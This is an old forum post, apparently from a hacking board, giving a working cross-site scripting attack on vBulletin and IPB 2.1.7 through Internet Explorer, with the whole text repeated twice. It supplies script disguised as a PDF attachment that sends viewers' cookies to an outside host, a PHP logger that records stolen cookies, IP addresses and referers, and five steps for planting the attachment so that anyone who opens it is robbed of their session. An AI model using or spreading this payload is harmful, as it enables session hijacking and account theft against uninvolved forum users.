liauliau
06.08.2006, 10:42
XSS vbulletin and IPB v2.1.7 With IE
test:<html><script> alert("hello");</script></html>
-----------------------------------------------------------------
test.pdf
------
<html><script>img = new Image(); img.src = "http://blablabla.org/c.php?c="+document.cookie;</script></html>
c.php
-----
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer= getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
fclose($fl);
?>
1_ Пишут test.pdf и c.php
2_ Помещенный c.php на webserver.
3_ Изменяют(Заменяют) url в test.pdf.
4_ Делают пост с test.pdf как attachement.
5_, когда кто - то будет смотреть на ваш attachement, Вы получите его печенье в log.txt
Лог сниффера
<html>
<script>img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</html>
test:<html><script> alert("hello");</script></html>
-----------------------------------------------------------------
test.pdf
------
<html><script>img = new Image(); img.src = "http://blablabla.org/c.php?c="+document.cookie;</script></html>
c.php
-----
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("m/d/Y g:i:s a");
$referer= getenv ('HTTP_REFERER');
$fl = fopen('log.txt', 'a');
fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer."\n".$cookie."\n");
fclose($fl);
?>
1_ Пишут test.pdf и c.php
2_ Помещенный c.php на webserver.
3_ Изменяют(Заменяют) url в test.pdf.
4_ Делают пост с test.pdf как attachement.
5_, когда кто - то будет смотреть на ваш attachement, Вы получите его печенье в log.txt
Лог сниффера
<html>
<script>img = new Image(); img.src ="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</html>